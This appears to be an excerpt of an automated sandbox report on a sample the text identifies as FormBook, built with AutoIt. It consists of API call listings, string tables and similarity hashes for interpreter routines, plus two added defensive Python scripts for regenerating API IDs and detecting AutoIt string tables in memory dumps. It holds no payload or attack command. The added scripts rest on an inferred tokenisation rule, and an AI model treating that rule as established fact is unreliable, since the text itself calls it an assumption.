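The two "API ID" summaries above (Window$Global$CreateRect$... for the picture-loading routine and Color$Rect$Object$... for the owner-draw routine) are derived from their "APIs" listings, and it is handy to be able to regenerate them offline when comparing functions from a fresh dump against the IDs in this report. Note what they identify: the first routine creates a window of class "AutoIt v3" plus a "static" child, reads a file into an HGLOBAL, wraps it with CreateStreamOnHGlobal/OleLoadPicture and pushes the result with SendMessageW(..., 0x172 /* STM_SETIMAGE */, ...), which is AutoIt runtime GUI code shared by every compiled AutoIt script, not anything specific to the FormBook payload; matching on these IDs classifies the interpreter, not the malware. The script below is an added example and not Joe Sandbox's own code. The tokenisation rule it implements (split the API name on CamelCase, drop tokens shorter than four characters such as Get, Set, Sys, Bk, Pen, Ex and W, count across plain and "Part of subcall function" entries alike, order count groups descending, sort alphabetically inside a group, join groups with "$") is inferred from the two listings and is an assumption; so is its handling of underscores in names such as ImageList_Remove, for which the report shows no ID. The sample input is the report's own API lines, copied inline with some trailing caller arguments trimmed.

```python
"""Regenerate a Joe Sandbox "API ID" string from a function's "APIs" listing.

Added example, not Joe Sandbox code. The rule is an assumption inferred from
the two listings in this report:
  1. take the API name before the module dot (GetSysColor.USER32 -> GetSysColor),
     from plain entries and "Part of subcall function ..." entries alike;
  2. split on CamelCase and drop tokens shorter than four characters;
  3. count tokens, order count groups descending, sort tokens alphabetically
     within a group, concatenate them and join the groups with "$".
Underscore handling (e.g. ImageList_Remove) is untested: the report gives no ID.
"""
import re
from collections import Counter

# "• Name.Module(...)" or "• Part of subcall function 0079D575: Name.Module(...)"
CALL_RE = re.compile(
    r"^\s*(?:\u2022\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([A-Za-z0-9_]+)\."
)
TOKEN_RE = re.compile(r"[A-Z][a-z]*")  # CreateStreamOnHGlobal -> Create Stream On H Global
MIN_TOKEN_LEN = 4                       # assumption: Get, Set, Sys, Bk, Pen, Ex, W, Pos vanish


def api_names(report_text):
    """API names in listing order, one per call entry, duplicates kept."""
    return [m.group(1) for m in map(CALL_RE.match, report_text.splitlines()) if m]


def api_id(report_text):
    """Build the '$'-joined API ID for one function's APIs listing."""
    counts = Counter(
        tok
        for name in api_names(report_text)
        for tok in TOKEN_RE.findall(name)
        if len(tok) >= MIN_TOKEN_LEN
    )
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


# Constructed sample: the report's APIs listing for the picture-loading routine.
SPLASH_IMAGE_APIS = """\
• DeleteObject.GDI32(00000000), ref: 0078A2FE
• DeleteObject.GDI32(00000000), ref: 0078A310
• DestroyWindow.USER32 ref: 0078A31E
• GetDesktopWindow.USER32 ref: 0078A338
• GetWindowRect.USER32(00000000), ref: 0078A33F
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0078A480
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0078A490
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF), ref: 0078A4D8
• GetClientRect.USER32(00000000,?), ref: 0078A4E4
• CreateWindowExW.USER32(00000000,static,00000000,5000000E), ref: 0078A51E
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0078A540
• GetFileSize.KERNEL32(00000000,00000000), ref: 0078A553
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 0078A55E
• GlobalLock.KERNEL32(00000000), ref: 0078A567
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000), ref: 0078A576
• GlobalUnlock.KERNEL32(00000000), ref: 0078A57F
• CloseHandle.KERNEL32(00000000), ref: 0078A586
• GlobalFree.KERNEL32(00000000), ref: 0078A591
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000), ref: 0078A5A3
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007BD9BC,00000000), ref: 0078A5B9
• GlobalFree.KERNEL32(00000000), ref: 0078A5C9
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0078A5EF
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0078A60E
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020), ref: 0078A630
• ShowWindow.USER32(00000004), ref: 0078A81D
"""

# Constructed sample: the owner-draw routine, including its subcall entries.
OWNERDRAW_APIS = """\
• SetTextColor.GDI32(?,00000000), ref: 0079D2DB
• GetSysColorBrush.USER32(0000000F), ref: 0079D30C
• GetSysColor.USER32(0000000F), ref: 0079D318
• SetBkColor.GDI32(?,000000FF), ref: 0079D332
• SelectObject.GDI32(?,00000000), ref: 0079D341
• InflateRect.USER32(?,000000FF,000000FF), ref: 0079D36C
• GetSysColor.USER32(00000010), ref: 0079D374
• CreateSolidBrush.GDI32(00000000), ref: 0079D37B
• FrameRect.USER32(?,?,00000000), ref: 0079D38A
• DeleteObject.GDI32(00000000), ref: 0079D391
• InflateRect.USER32(?,000000FE,000000FE), ref: 0079D3DC
• FillRect.USER32(?,?,00000000), ref: 0079D40E
• GetWindowLongW.USER32(?,000000F0), ref: 0079D439
  • Part of subcall function 0079D575: GetSysColor.USER32(00000012), ref: 0079D5AE
  • Part of subcall function 0079D575: SetTextColor.GDI32(?,?), ref: 0079D5B2
  • Part of subcall function 0079D575: GetSysColorBrush.USER32(0000000F), ref: 0079D5C8
  • Part of subcall function 0079D575: GetSysColor.USER32(0000000F), ref: 0079D5D3
  • Part of subcall function 0079D575: GetSysColor.USER32(00000011), ref: 0079D5F0
  • Part of subcall function 0079D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0079D5FE
  • Part of subcall function 0079D575: SelectObject.GDI32(?,00000000), ref: 0079D60F
  • Part of subcall function 0079D575: SetBkColor.GDI32(?,00000000), ref: 0079D618
  • Part of subcall function 0079D575: SelectObject.GDI32(?,?), ref: 0079D625
  • Part of subcall function 0079D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0079D644
  • Part of subcall function 0079D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0079D65B
  • Part of subcall function 0079D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0079D670
  • Part of subcall function 0079D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0079D698
"""

if __name__ == "__main__":
    for label, listing in (("splash", SPLASH_IMAGE_APIS), ("ownerdraw", OWNERDRAW_APIS)):
        print(label, len(api_names(listing)), "calls ->", api_id(listing))
```

Both listings reproduce the report's IDs exactly, which is why the four-character cut-off and the inclusion of subcall entries are stated as the rule: with subcalls excluded the second routine's Brush, Inflate and Select counts would no longer tie at three and the grouping would differ. The "API String ID" numbers on the page are a separate hash of this string together with the String ID and are not reproduced here.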
APIs
• DestroyWindow.USER32 ref: 0074B98B
• DeleteObject.GDI32(00000000), ref: 0074B9CD
• DeleteObject.GDI32(00000000), ref: 0074B9D8
• DestroyIcon.USER32(00000000), ref: 0074B9E3
• DestroyWindow.USER32(00000000), ref: 0074B9EE
• SendMessageW.USER32(?,00001308,?,00000000), ref: 007AD2AA
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007AD2E3
• MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 007AD711
  • Part of subcall function 0074B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0074B759,?,00000000,?,?,?,?,0074B72B,00000000,?), ref: 0074BA58
• SendMessageW.USER32 ref: 007AD758
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007AD76F
• ImageList_Destroy.COMCTL32(00000000), ref: 007AD785
• ImageList_Destroy.COMCTL32(00000000), ref: 007AD790
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
• String ID: 0
• API String ID: 464785882-4108050209
• Opcode ID: df2c94e7a9e6907ca455950d64a7e931be4ef17694c7aae7b304d0462da74302
• Instruction ID: 335caa2f817b20bf759c49e3d5297faf6586e42aced9dcd424a3d424aefecf83
• Opcode Fuzzy Hash: df2c94e7a9e6907ca455950d64a7e931be4ef17694c7aae7b304d0462da74302
• Instruction Fuzzy Hash: 2B128F70504241DFDB25CF24C888BA9B7E5FF9A304F144669F98ACBA62C739EC51CB91
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0077DBD6
• GetDriveTypeW.KERNEL32(?,007CDC54,?,\\.\,007CDC00), ref: 0077DCC3
• SetErrorMode.KERNEL32(00000000,007CDC54,?,\\.\,007CDC00), ref: 0077DE29
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Opcode ID: 911308254cf046bdc55aa31c509ece29704cf511bd38cad240f87659fbc6bbe7
• Instruction ID: f9e27fabd75bc06ac9d5b7c59fcaad4de24c17840dbe8be922ef6191b148284c
• Opcode Fuzzy Hash: 911308254cf046bdc55aa31c509ece29704cf511bd38cad240f87659fbc6bbe7
• Instruction Fuzzy Hash: EA51B3B0308342EB8A30DF15C989869B7B1FF98780F20D91AF01B9B295DB6DDD45D742
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-86951937
• Opcode ID: cafe11888937552ca7c7c7bcbfaedec7799cd71c01bee5847f979bbcbe7df384
• Instruction ID: 00790dfb47cabf6ff5f3acb32eae75de17620038db8d2575eccd320dcba607d1
• Opcode Fuzzy Hash: cafe11888937552ca7c7c7bcbfaedec7799cd71c01bee5847f979bbcbe7df384
• Instruction Fuzzy Hash: 2C812870740215FBEB22AA64CC86FBB7769AF55301F044039FD06BA183EB6CD946C7A1
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0079C788
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0079C83E
• SendMessageW.USER32(?,00001102,00000002,?), ref: 0079C859
• SendMessageW.USER32(?,000000F1,?,00000000), ref: 0079CB15
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: 0
• API String ID: 2326795674-4108050209
• Opcode ID: a4f28d2916f8b3cd1a56801f587d76d534398e082eebed5420dfe3887179ea55
• Instruction ID: 9baca86184c0e3b7c0f2de9ff705cb7c468c31c9717fc3ce388984a67f05725e
• Opcode Fuzzy Hash: a4f28d2916f8b3cd1a56801f587d76d534398e082eebed5420dfe3887179ea55
• Instruction Fuzzy Hash: 2CF1C271104301AFEF228F24E849BAABBE4FF49354F084629F599D62A1D77CDD40DBA1
APIs
• CharUpperBuffW.USER32(?,?,007CDC00), ref: 00796449
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
• API String ID: 3964851224-45149045
• Opcode ID: b749304384fc701bc049e3ee7ca8e65aac3e1878e576e11fc3e25dbaf2b73eae
• Instruction ID: 00a62d8d98db88296411519a47b974ed9ea9cbe26209e38779d508e93dc53a1b
• Opcode Fuzzy Hash: b749304384fc701bc049e3ee7ca8e65aac3e1878e576e11fc3e25dbaf2b73eae
• Instruction Fuzzy Hash: A6C1AE30604245CBCF04EF10D595AAE77A5BF99354F004969F8869B3A3DB3CED4ACB92
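The two listings above expose string tables belonging to the AutoIt3 interpreter that is embedded in this sample: the `__wcsnicmp` routine compares script text against the preprocessor directives (`#include`, `#requireadmin`, `#OnAutoItStartRegister`, ...) and the `CharUpperBuffW` routine upper-cases the ControlCommand verbs (`ADDSTRING`, `CHECK`, `SENDCOMMANDID`, ...). Both tables are wide (UTF-16LE) strings, which is why an ASCII `strings` pass over a dump does not surface them. The scanner below is an added example for this page, not Joe Sandbox code and not code recovered from the sample; the string lists are copied from the `String ID` entries above, while the function names, the verdict thresholds, the even-offset filter (which assumes the dump starts on a 2-byte boundary) and the constructed sample blob are assumptions.

```python
"""Scan a memory dump or PE image for the AutoIt3 runtime string tables.

Added example for this report page; not Joe Sandbox code and not code from
the sample. String sets come from the two function listings above; the
thresholds and the sample blob are assumptions.
"""
import re
import sys
from typing import Dict, List, Optional

# Preprocessor directives compared by the __wcsnicmp routine (String ID above).
AUTOIT_DIRECTIVES: List[str] = [
    "#OnAutoItStartRegister", "#ce", "#comments-end", "#comments-start", "#cs",
    "#include", "#include-once", "#notrayicon", "#pragma compile", "#requireadmin",
]
# ControlCommand verbs upper-cased by the CharUpperBuffW routine (String ID above).
CONTROL_COMMANDS: List[str] = [
    "ADDSTRING", "CHECK", "CURRENTTAB", "DELSTRING", "EDITPASTE", "FINDSTRING",
    "GETCURRENTCOL", "GETCURRENTLINE", "GETCURRENTSELECTION", "GETLINE",
    "GETLINECOUNT", "GETSELECTED", "HIDEDROPDOWN", "ISCHECKED", "ISENABLED",
    "ISVISIBLE", "SELECTSTRING", "SENDCOMMANDID", "SETCURRENTSELECTION",
    "SHOWDROPDOWN", "TABLEFT", "TABRIGHT", "UNCHECK",
]


def find_wide_strings(blob: bytes, needles: List[str]) -> Dict[str, List[int]]:
    """Map each needle found as UTF-16LE in blob to its byte offsets.

    Only even offsets count: wide-char tables in a PE image are 2-byte
    aligned, so an odd-offset match is a coincidence in unrelated bytes
    (assumption: the dump itself starts on a 2-byte boundary).
    """
    hits: Dict[str, List[int]] = {}
    for s in needles:
        pat = re.escape(s.encode("utf-16-le"))
        offs = [m.start() for m in re.finditer(pat, blob) if m.start() % 2 == 0]
        if offs:
            hits[s] = offs
    return hits


def autoit_runtime_score(blob: bytes) -> Dict[str, object]:
    """Report what fraction of each table is present and a coarse verdict.

    Thresholds are an assumption for this example: a few directives alone are
    weak evidence, but most of both tables together is characteristic of an
    embedded interpreter rather than a script merely mentioning AutoIt.
    """
    d = find_wide_strings(blob, AUTOIT_DIRECTIVES)
    c = find_wide_strings(blob, CONTROL_COMMANDS)
    all_offsets = [o for offs in list(d.values()) + list(c.values()) for o in offs]
    first: Optional[int] = min(all_offsets, default=None)
    verdict = "autoit-runtime" if len(d) >= 6 and len(c) >= 12 else "inconclusive"
    return {
        "directives": len(d) / len(AUTOIT_DIRECTIVES),
        "control_commands": len(c) / len(CONTROL_COMMANDS),
        "first_offset": first,   # where to start looking in the dump
        "verdict": verdict,
    }


def build_sample_blob() -> bytes:
    """Constructed input for a stand-alone run; this is not a real dump.

    A fake header, eight directives and fifteen verbs stored as UTF-16LE,
    an ASCII decoy that must not be counted, and trailing junk.
    """
    parts = [b"MZ" + b"\x00" * 62]
    parts += [s.encode("utf-16-le") + b"\x00\x00" for s in AUTOIT_DIRECTIVES[:8]]
    parts.append(b"#requireadmin\x00")  # 1-byte chars: not how the runtime stores it
    parts += [s.encode("utf-16-le") + b"\x00\x00" for s in CONTROL_COMMANDS[:15]]
    parts.append(b"\xff" * 16)
    return b"".join(parts)


if __name__ == "__main__":
    # Usage: python autoit_strings.py <dump-or-pe>; with no argument, scan the sample blob.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_blob()
    for key, value in autoit_runtime_score(data).items():
        print(f"{key}: {value}")
```

Run it against the `.sdmp` files listed under Memory Dump Source (offset 0x730000 onward) to confirm that the tables sit in the interpreter's read-only data; a match in a dump of a different process would indicate the runtime was injected there. Note that `#include` also matches inside `#include-once`, so offsets, not just presence, are returned for manual review.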
APIs
• GetSysColor.USER32(00000012), ref: 0079D5AE
• SetTextColor.GDI32(?,?), ref: 0079D5B2
• GetSysColorBrush.USER32(0000000F), ref: 0079D5C8
• GetSysColor.USER32(0000000F), ref: 0079D5D3
• CreateSolidBrush.GDI32(?), ref: 0079D5D8
• GetSysColor.USER32(00000011), ref: 0079D5F0
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 0079D5FE
• SelectObject.GDI32(?,00000000), ref: 0079D60F
• SetBkColor.GDI32(?,00000000), ref: 0079D618
• SelectObject.GDI32(?,?), ref: 0079D625
• InflateRect.USER32(?,000000FF,000000FF), ref: 0079D644
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0079D65B
• GetWindowLongW.USER32(00000000,000000F0), ref: 0079D670
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0079D698
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0079D6BF
• InflateRect.USER32(?,000000FD,000000FD), ref: 0079D6DD
• DrawFocusRect.USER32(?,?), ref: 0079D6E8
• GetSysColor.USER32(00000011), ref: 0079D6F6
• SetTextColor.GDI32(?,00000000), ref: 0079D6FE
• DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0079D712
• SelectObject.GDI32(?,0079D2A5), ref: 0079D729
• DeleteObject.GDI32(?), ref: 0079D734
• SelectObject.GDI32(?,?), ref: 0079D73A
• DeleteObject.GDI32(?), ref: 0079D73F
• SetTextColor.GDI32(?,?), ref: 0079D745
• SetBkColor.GDI32(?,?), ref: 0079D74F
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
• Opcode ID: a8c83ddf682c91a08d726d29899694cf7087a19ab4b42028d12a6c7c08e0aede
• Instruction ID: 479b1649757416be9e3824d565f49848f1895cc0771ef4b1231fdff6ca243437
• Opcode Fuzzy Hash: a8c83ddf682c91a08d726d29899694cf7087a19ab4b42028d12a6c7c08e0aede
• Instruction Fuzzy Hash: 18511A71900208BFDF209FA8DC48FAE7B79EF08324F118615F915AB2A1E7799E508F54
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0079B7B0
                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0079B7C1
                                                                                                                                                    • CharNextW.USER32(0000014E), ref: 0079B7F0
                                                                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0079B831
                                                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0079B847
                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0079B858
                                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0079B875
                                                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0079B8C7
                                                                                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0079B8DD
                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0079B90E
                                                                                                                                                    • _memset.LIBCMT ref: 0079B933
                                                                                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0079B97C
                                                                                                                                                    • _memset.LIBCMT ref: 0079B9DB
                                                                                                                                                    • SendMessageW.USER32 ref: 0079BA05
                                                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0079BA5D
                                                                                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 0079BB0A
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0079BB2C
                                                                                                                                                    • GetMenuItemInfoW.USER32(?), ref: 0079BB76
                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0079BBA3
                                                                                                                                                    • DrawMenuBar.USER32(?), ref: 0079BBB2
                                                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0079BBDA
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 1073566785-4108050209
                                                                                                                                                    • Opcode ID: 22f6a5f13bf39572a2a1df49a971882357969e3ac598b7af2b26e25c7a215bf8
                                                                                                                                                    • Instruction ID: 1a3e2c258a0598dbd5598b392d3159e02ed476ab0fcc5363021b6f9e9185af92
                                                                                                                                                    • Opcode Fuzzy Hash: 22f6a5f13bf39572a2a1df49a971882357969e3ac598b7af2b26e25c7a215bf8
                                                                                                                                                    • Instruction Fuzzy Hash: A2E1A3B1900218EBDF20DFA5ED85EEE7B78FF05714F108256F919AA290D7789941CF60
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Foreground
                                                                                                                                                    • String ID: ACTIVE$ALL$CLASS$H+~$HANDLE$INSTANCE$L+~$LAST$P+~$REGEXPCLASS$REGEXPTITLE$T+~$TITLE
                                                                                                                                                    • API String ID: 62970417-4219687078
                                                                                                                                                    • Opcode ID: abbe5ee5fae7860130d4d0cf40eb6ce201fe2808a90617275e0abea6c742ddca
                                                                                                                                                    • Instruction ID: 05b5fafbac9e22fb493bbd4343281337116276189ddf3582074158fbf582960e
                                                                                                                                                    • Opcode Fuzzy Hash: abbe5ee5fae7860130d4d0cf40eb6ce201fe2808a90617275e0abea6c742ddca
                                                                                                                                                    • Instruction Fuzzy Hash: FFD10730508242EBDB14EF14C885AAABBB4BF95344F104B2DF456535A3DB3CE95BCB91
                                                                                                                                                    APIs
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0079778A
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0079779F
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 007977A6
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00797808
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00797834
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0079785D
                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0079787B
                                                                                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007978A1
                                                                                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 007978B6
                                                                                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007978C9
                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 007978E9
                                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00797904
                                                                                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00797918
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00797930
                                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00797956
                                                                                                                                                    • GetMonitorInfoW.USER32 ref: 00797970
                                                                                                                                                    • CopyRect.USER32(?,?), ref: 00797987
                                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 007979F2
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                                                    • Opcode ID: ad3233ae95e7f17990db957645dbc7eac2309aceb9bf7299a45939d661b3e728
                                                                                                                                                    • Instruction ID: 4e13f0832a6ac914800b335984d2854edbfc11ec82169dcf9efde2e306991959
                                                                                                                                                    • Opcode Fuzzy Hash: ad3233ae95e7f17990db957645dbc7eac2309aceb9bf7299a45939d661b3e728
                                                                                                                                                    • Instruction Fuzzy Hash: 76B18F71618301AFDB18DF64D889B5ABBE4FF88310F00891DF5999B291D778EC04CB95
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00776CFB
                                                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00776D21
                                                                                                                                                    • _wcscpy.LIBCMT ref: 00776D4F
                                                                                                                                                    • _wcscmp.LIBCMT ref: 00776D5A
                                                                                                                                                    • _wcscat.LIBCMT ref: 00776D70
                                                                                                                                                    • _wcsstr.LIBCMT ref: 00776D7B
                                                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00776D97
                                                                                                                                                    • _wcscat.LIBCMT ref: 00776DE0
                                                                                                                                                    • _wcscat.LIBCMT ref: 00776DE7
                                                                                                                                                    • _wcsncpy.LIBCMT ref: 00776E12
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                    • API String ID: 699586101-1459072770
                                                                                                                                                    • Opcode ID: cd6af3e95397fada2bfb476212eedb7b3abb67d65858959d9ad3fb34811049ba
                                                                                                                                                    • Instruction ID: c4350145e543b408bdc25498679134932ff0edb3217b5085fd923c8acb4bfa30
                                                                                                                                                    • Opcode Fuzzy Hash: cd6af3e95397fada2bfb476212eedb7b3abb67d65858959d9ad3fb34811049ba
                                                                                                                                                    • Instruction Fuzzy Hash: E341D372600200BBEB10AB648C4BEFF776CEF45751F044169FD05A2182FFBC9A0596B5
